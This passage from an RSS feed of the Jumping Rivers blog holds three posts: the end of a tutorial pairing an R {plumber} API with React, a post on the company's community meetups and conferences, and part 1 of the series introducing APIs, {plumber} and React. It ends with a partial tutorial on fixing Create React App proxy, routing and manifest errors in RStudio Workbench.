&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cors &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(res) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; res&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;setHeader&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Access-Control-Allow-Origin&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;http://localhost:3000&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plumber&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;forward&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We should be able to restart the API and the slider should now update the graph.
Excellent!
&lt;img class="image-center" src="HelloReact.png" alt="Screenshot of histogram of waiting times with bins slider." style="width:650px; class:image-center"&gt;&lt;/p&gt;
&lt;p&gt;That&amp;rsquo;s it for part 2! In part 3 of our series, we will show you how to host on RStudio Connect!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-shiny-plumber-react-node-npm-part-2/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Jumping Rivers and the Data Science Community</title><link>https://www.jumpingrivers.com/blog/jr-and-the-data-science-community/</link><pubDate>Tue, 12 Jul 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/jr-and-the-data-science-community/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/jr-and-the-data-science-community/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/jr-and-the-data-science-community/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;At Jumping Rivers, we love data science! Surprised? Didn&amp;rsquo;t think so &amp;hellip; But, did you know that as well as providing training and consultancy, we also like to get involved with the data science community!&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re reading this, then you&amp;rsquo;ve already found our blog, where we release weekly posts giving an insight into the projects we do here at JR, as well as hints, tips and tutorials to help you improve your programming. If this is your first trip here, take a look at some of &lt;a href="https://www.jumpingrivers.com/blog/" rel="external"&gt;our previous work&lt;/a&gt;!&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-jr-and-the-data-science-community"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;re lucky enough to be based in the incredible &lt;a href="https://www.thecatalystnewcastle.co.uk/" rel="external"&gt;Catalyst building&lt;/a&gt; here in Newcastle upon Tyne, and we make the most of this great space by running regular Meetups for the &lt;a href="https://www.meetup.com/Newcastle-Upon-Tyne-Data-Science-Meetup/" rel="external"&gt;North East Data Scientists&lt;/a&gt; right here. These meetups are free to attend, to make data science accessible to everyone, with all costs generously covered by &lt;a href="https://www.nicd.org.uk/" rel="external"&gt;NICD&lt;/a&gt; and the &lt;a href="https://www.r-consortium.org/" rel="external"&gt;R Consortium&lt;/a&gt; (and &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;JR&lt;/a&gt; of course). Usually consisting of two talks from industry experts as well as our newly introduced pre-event workshops, these events are great opporutunties for networking with other like minded people and learning from your peers.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;ve been keeping an eye on &lt;a href="https://twitter.com/jumping_uk" rel="external"&gt;our Twitter&lt;/a&gt;, you&amp;rsquo;ll know that this October we&amp;rsquo;re going to be running our in-person conference, Shiny in Production. This conference consists of half a day of workshops, followed by a day of talks from some excellent speakers across industry who are going to tell us about all things Shiny! Take a look at the &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;event website&lt;/a&gt; to see what we have in store!&lt;/p&gt;
&lt;p&gt;Our JR data scientists can often be found giving talks at conferences - up next we have &lt;a href="https://twitter.com/csgillespie" rel="external"&gt;Colin Gillespie&lt;/a&gt; and &lt;a href="https://twitter.com/nrennie35" rel="external"&gt;Nicola Rennie&lt;/a&gt; giving Lightning Talks at &lt;a href="https://www.rstudio.com/conference/" rel="external"&gt;rstudio::conf&lt;/a&gt;! Upcoming conferences can be found on our &lt;a href="https://www.jumpingrivers.com/community/" rel="external"&gt;communities page&lt;/a&gt;, or for R specifically, we also maintain &lt;a href="https://jumpingrivers.github.io/meetingsR/" rel="external"&gt;a list online&lt;/a&gt; with upcoming events, both virtual and in-person.&lt;/p&gt;
&lt;p&gt;We have lots more exciting things in the works as well - we&amp;rsquo;ve already started planning another data science conference for next Spring, and maybe even a workshop with our new partner, &lt;a href="https://h2o.ai/" rel="external"&gt;H2O.ai&lt;/a&gt;, this November &amp;hellip; watch this space!&lt;/p&gt;
&lt;p&gt;If you have any other ideas of how we can get involved, we&amp;rsquo;d love to here from you! Get in touch via &lt;a href="https://www.jumpingrivers.com/contact/" rel="external"&gt;our website&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/jr-and-the-data-science-community/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Recreating the Shiny App tutorial with a Plumber API + React: Part 1</title><link>https://www.jumpingrivers.com/blog/r-shiny-plumber-react-part-1/</link><pubDate>Thu, 07 Jul 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-shiny-plumber-react-part-1/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-shiny-plumber-react-part-1/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-shiny-plumber-react-part-1/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part one of our three part series&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: Recreating the Shiny App tutorial with a Plumber API + React: Part 1 (this post)&lt;/li&gt;
&lt;li&gt;Part 2: &lt;a href="https://www.jumpingrivers.com/blog/r-shiny-plumber-react-node-npm-part-2" rel="external"&gt;Recreating the Shiny App tutorial with a Plumber API + React: Part 2&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 3: &lt;a href="https://www.jumpingrivers.com/blog/r-shiny-plumber-react-part-3" rel="external"&gt;Recreating the Shiny App tutorial with a Plumber API + React: Part 3&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;RStudio Connect supports a spectrum of data products, static or dynamic.&lt;/p&gt;
&lt;p&gt;Being able to host static content on RStudio Connect means we can host ReactJS applications on the platform. React is a great framework for developing web applications, with a lot of power and flexibility when creating user interfaces. Separating {shiny} applications into a user interface and a data processing API has its advantages.&lt;/p&gt;
&lt;p&gt;In this blog series, we will guide you through creating the application from the RStudio tutorial for creating a {shiny} app, except we&amp;rsquo;ll be attempting it using ReactJS and an R {plumber} API instead of {shiny}. In this blog, part 1, we will be introducing you to the technologies we will need for the tutorial.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-r-shiny-plumber-react-part-1"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="what-is-an-api-application-programming-interface"&gt;What is an API? (Application Programming Interface)&lt;/h2&gt;
&lt;p&gt;API stands for application programming interface. An API is a set of software functions and protocols that allow one application to access the features or data of another application. For example, the Google Maps API lets developers embed Google Maps into their own websites. APIs can also be used to allow different applications to communicate with each other. For example, the Twitter API lets developers build applications that post tweets or display tweets from a specific user. APIs are an essential part of many web-based applications, and they are often made available by companies in order to encourage developers to create new products and services that make use of their data or services.&lt;/p&gt;
&lt;p&gt;An API acts as an intermediary layer to interact with an application. As long as we follow the API protocol for making requests, we are free to plug anything that could interact with the application, provided that we use the protocol specified in the API.&lt;/p&gt;
&lt;p&gt;Here’s how an API works:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;A client application initiates an API call to retrieve information—also known as a request. This request is processed from an application to the web server via the API’s Uniform Resource Identifier (URI) and includes a request verb, headers, and sometimes a request body.&lt;/li&gt;
&lt;li&gt;After receiving a valid request, the API makes a call to the external program or web server.&lt;/li&gt;
&lt;li&gt;The server sends a response to the API with the requested information.&lt;/li&gt;
&lt;li&gt;The API transfers the data to the initial requesting application.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3 id="what-is-plumber"&gt;What is {plumber}?&lt;/h3&gt;
&lt;p&gt;The {plumber} R package helps you create APIs in R, making it easy to share your R code with others. With {plumber}, you can easily turn your R code into a web API that can be accessed from any language or platform. {plumber} also makes it easy to deploy your APIs to production servers, making it a great tool for sharing your R code with others. If you&amp;rsquo;re looking for an easy way to create APIs in R, then {plumber} is the perfect tool for you.&lt;/p&gt;
&lt;p&gt;Here is the example {plumber} API listed at &lt;a href="https://www.rplumber.io/" rel="external"&gt;rplumber.io&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# plumber.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* Echo back the input&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* @param msg The message to echo&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* @get /echo&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(msg &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(msg &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;The message is: &amp;#39;&amp;#34;&lt;/span&gt;, msg, &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#39;&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* Plot a histogram&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* @serializer png&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* @get /plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rand &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rnorm&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;hist&lt;/span&gt;(rand)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* Return the sum of two numbers&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* @param a The first number to add&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* @param b The second number to add&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* @post /sum&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(a, b) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; a &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; b
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The format is similar to standard R functions but with some additional roxygen2 like comments above them.
The comments are prefixed with a hash and allow {plumber} to make your R functions available as API endpoints.
The comment directly before the function signifies the type of HTTP method we would like for our endpoint.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;@get - The GET method requests a representation of the specified resource. Requests using GET should only retrieve data.&lt;/li&gt;
&lt;li&gt;@post - The POST method is used to submit an entity to the specified resource, often causing a change in state or side effects on the server.&lt;/li&gt;
&lt;li&gt;@delete - The DELETE method deletes the specified resource.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There are other HTTP request method types but they are outside the scope of this tutorial and we will only provide a GET request in this tutorial to serve histogram data.&lt;/p&gt;
&lt;p&gt;There are extra parameters and modifiers you can add to change the functionality of your endpoints. Here is a handy &lt;a href="https://github.com/rstudio/cheatsheets/blob/main/plumber.pdf" rel="external"&gt;Cheat Sheet&lt;/a&gt; to refer to for more information on this.&lt;/p&gt;
&lt;h3 id="what-is-react"&gt;What is React?&lt;/h3&gt;
&lt;p&gt;React or ReactJS is a JavaScript library that specializes in helping developers build user interfaces.
You can build encapsulated components that manage their own state, then compose them to make complex user interfaces.&lt;/p&gt;
&lt;p&gt;It has been developed by a small team working for Facebook and it is the most widely adopted JavaScript web framework, so it comes with a range of extensions and feature libraries and support.
React allows developers to create large web applications that can change data, without reloading the page. The main purpose of React is to be fast, scalable, and simple. One of the main concepts in React is the idea of state and the UI rerenders individual components when their state has changed rather than rerendering the whole application.&lt;/p&gt;
&lt;h2 id="why-react-instead-of-shiny"&gt;Why React Instead of {shiny}?&lt;/h2&gt;
&lt;p&gt;For R developers wanting to build basic interactive web pages, {shiny} is an excellent tool. For an R developer to get a simple web app up and running with {shiny} should take little time and effort. Some HTML/CSS knowledge might be necessary to create a {shiny} application, but an R developer should be able to get by with minimal JavaScript understanding.&lt;/p&gt;
&lt;p&gt;However, even though {shiny} supports UI creation, there are processing overheads in generating the output HTML/JavaScript from the {shiny} package functions.
React is optimised for creating UI elements and by separating the UI from the data processing we can reduce the overhead on R and use the extra capacity for data processing.&lt;/p&gt;
&lt;p&gt;Web developers are more likely to be familiar with React than with {shiny}. By separating the two you can combine the strengths of both disciplines; R developers can focus on the data science side of things in R, React developers can focus on frontend design, and the two can meet at the API level to discuss the required functionality to put into the interface between them. This way neither party has to be concerned with the inner workings of the other they just have to agree on an API protocol as their means of collaboration.&lt;/p&gt;
&lt;p&gt;In reality we could use any frontend web framework and the concept of separating concerns into frontend and backend should still apply. The upcoming tutorial will use React as the frontend framework.&lt;/p&gt;
&lt;p&gt;In part two we will work through an exercise in creating a small React+Plumber app!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-shiny-plumber-react-part-1/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Developing React Applications in RStudio Workbench</title><link>https://www.jumpingrivers.com/blog/react-workbench/</link><pubDate>Thu, 30 Jun 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/react-workbench/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/react-workbench/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/react-workbench/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="introduction"&gt;Introduction&lt;/h2&gt;
&lt;p&gt;RStudio Workbench provides a development environment for R, Python, and many other languages. When
developing a performant web application you may progress from Shiny towards tools like Plumber. This
allows you to continue development of the true application code, modelling, data processing in the
language you already know, R, while providing an interface to those processes suitable for embedding
in larger web-based applications.&lt;/p&gt;
&lt;p&gt;As a Shiny developer, one popular front-end library you might already be familiar with is React. React
is used in many popular {htmlwidgets} such as &lt;a href="https://glin.github.io/reactable/" rel="external"&gt;{reactable}&lt;/a&gt; and
anything built with &lt;a href="https://react-r.github.io/reactR/" rel="external"&gt;{reactR}&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://reactjs.org/" rel="external"&gt;React&lt;/a&gt; is a &lt;em&gt;&amp;ldquo;A JavaScript library for building user interfaces&amp;rdquo;&lt;/em&gt;. It provides
the coupling between your data, application state, and the HTML-based user interface. An optional
extension of JavaScript called JSX allows efficient definition of React based user interface components.
Another optional extension of JavaScript called &lt;a href="https://www.typescriptlang.org/" rel="external"&gt;TypeScript&lt;/a&gt; enables
strict typing of your code, potentially improving the quality.&lt;/p&gt;
&lt;p&gt;This short article covers some technical hurdles to make use of the standard
&lt;a href="https://create-react-app.dev/" rel="external"&gt;Create React App&lt;/a&gt; workflow, this is compatible with Typescript, Redux,
and other extensions.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-react-workbench"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="initial-setup"&gt;Initial Setup&lt;/h2&gt;
&lt;p&gt;We are using RStudio Workbench for our development, and VS Code Sessions within Workbench as our IDE.
Some extensions will be installed by default, a few of our enabled extensions include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/usernamehw/vscode-error-lens" rel="external"&gt;&lt;strong&gt;Error Lens&lt;/strong&gt;&lt;/a&gt;, for better inline error
notifications&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/mhutchie/vscode-git-graph" rel="external"&gt;&lt;strong&gt;Git Graph&lt;/strong&gt;&lt;/a&gt;, for reviewing git history&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/gitkraken/vscode-gitlens" rel="external"&gt;&lt;strong&gt;GitLens&lt;/strong&gt;&lt;/a&gt;, for additional inline information
about git history&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.rstudio.com/ide/server-pro/vscode_sessions/vs_code_sessions.html#rstudio-workbench-extension" rel="external"&gt;&lt;strong&gt;RStudio
Workbench&lt;/strong&gt;&lt;/a&gt;,
for detection of running servers&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="Start a new VS Code Session in RStudio Workbench" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/react-workbench/new_session.png" width="636"&gt;&lt;/p&gt;
&lt;p&gt;The last extension is the most important and is installed when following the RStudio Workbench
&lt;a href="https://docs.rstudio.com/rsw/documentation/" rel="external"&gt;installation guide&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We will assume a recent version of Node.js is installed, check with &lt;code&gt;nodejs --version&lt;/code&gt;. We are using
version 16.13.2. Open a VS Code Session in RStudio Workbench and create a new project:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;npx create-react-app my-app --template typescript
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="the-issues"&gt;The issues&lt;/h2&gt;
&lt;p&gt;Following the getting started instructions, we will enter the new project and start the development
server:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cd my-app
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;npm start
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If port 3000 is already in use, you will be prompted to use another port, allow this. Now we will
use the RStudio Workbench extension to find our development server, in our case, &lt;code&gt;0.0.0.0:3001&lt;/code&gt;:&lt;/p&gt;
&lt;img src="workbench_proxies.png" alt="RStudio Workbench sidebar with running servers" style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;When you open one of these links you will find a blank page instead of the usual spinning React
logo. Inspecting the Console will identify several issues. These all stem from the URL provided by
the RStudio Workbench extension. We can easily resolve all of these problems.&lt;/p&gt;
&lt;p&gt;&lt;img alt="Initial React App errors when running behind a proxy" height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/react-workbench/react_errors.png" width="907"&gt;&lt;/p&gt;
&lt;h3 id="issue-1---incorrect-application-root"&gt;Issue 1 - Incorrect application root&lt;/h3&gt;
&lt;p&gt;The example template (&lt;code&gt;public/index.html&lt;/code&gt;) uses a variable PUBLIC_URL to enable development within
different environments. The favicon has an href of &lt;code&gt;%PUBLIC_URL%/favicon.ico&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Our application is now privately available at
&lt;code&gt;https://rstudio.jumpingrivers.cloud/workbench/s/ecb2d3c9ab5a71bf18071/p/fc2c1fd4/&lt;/code&gt; for us to use
and test while developing it. Click on a server in the RStudio Workbench extension to open your
own link.&lt;/p&gt;
&lt;p&gt;Create a file called &lt;code&gt;.env.development&lt;/code&gt; in the root of your project with the following contents:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;PUBLIC_URL&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;/workbench/s/ecb2d3c9ab5a71bf18071/p/fc2c1fd4
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If &lt;code&gt;npm start&lt;/code&gt; is still running, stop it now and restart it. Refresh your application now as well.
The session and process IDs will usually remain the same so you will have another blank page, but
fewer console errors.&lt;/p&gt;
&lt;h3 id="issue-2---incorrect-routes-in-express-dev-server"&gt;Issue 2 - Incorrect routes in Express dev server&lt;/h3&gt;
&lt;p&gt;The files you are expecting are now missing because the development server uses the new PUBLIC_URL
to serve content, but RStudio Workbench is removing the subdirectories when it maps back to
0.0.0.0:3000.&lt;/p&gt;
&lt;p&gt;We can set up a proxy to server content on both &amp;ldquo;/workbench/s/ecb2d3c9ab5a71bf18071/p/fc2c1fd4&amp;rdquo; and
&amp;ldquo;/&amp;rdquo;. Create a file &amp;ldquo;./src/setupProxy.js&amp;rdquo; with the following content:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;module.exports &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt; (app) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app.use((req, _, next) =&amp;gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;req.url.startsWith(process.env.PUBLIC_URL))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; req.url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; process.env.PUBLIC_URL &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; req.url;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; next();
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; });
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;};
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;When you now restart the dev server &lt;code&gt;npm start&lt;/code&gt; and refresh the browser you will finally see a
spinning React logo.&lt;/p&gt;
&lt;img src="react_app.png" alt="Default Create React App initial view" style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;Two errors in the console remain.&lt;/p&gt;
&lt;h3 id="issue-3---invalid-manifest"&gt;Issue 3 - Invalid manifest&lt;/h3&gt;
&lt;p&gt;By definition, a web application manifest will not be requested with any authentication cookies.
This is a very easy fix.&lt;/p&gt;
&lt;p&gt;In &amp;ldquo;public/index.html&amp;rdquo; add &lt;code&gt;crossorigin=&amp;quot;use-credentials&amp;quot;&lt;/code&gt;, e.g.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;link&lt;/span&gt; rel&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;manifest&amp;#34;&lt;/span&gt; href&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;%PUBLIC_URL%/manifest.json&amp;#34;&lt;/span&gt; /&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;becomes:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;link&lt;/span&gt; rel&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;manifest&amp;#34;&lt;/span&gt; href&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;%PUBLIC_URL%/manifest.json&amp;#34;&lt;/span&gt; crossorigin&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;use-credentials&amp;#34;&lt;/span&gt; /&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Refresh your application to see the changes immediately. In some cases you may require
authentication in produciton, but if not then you should only enable it in development mode. We can
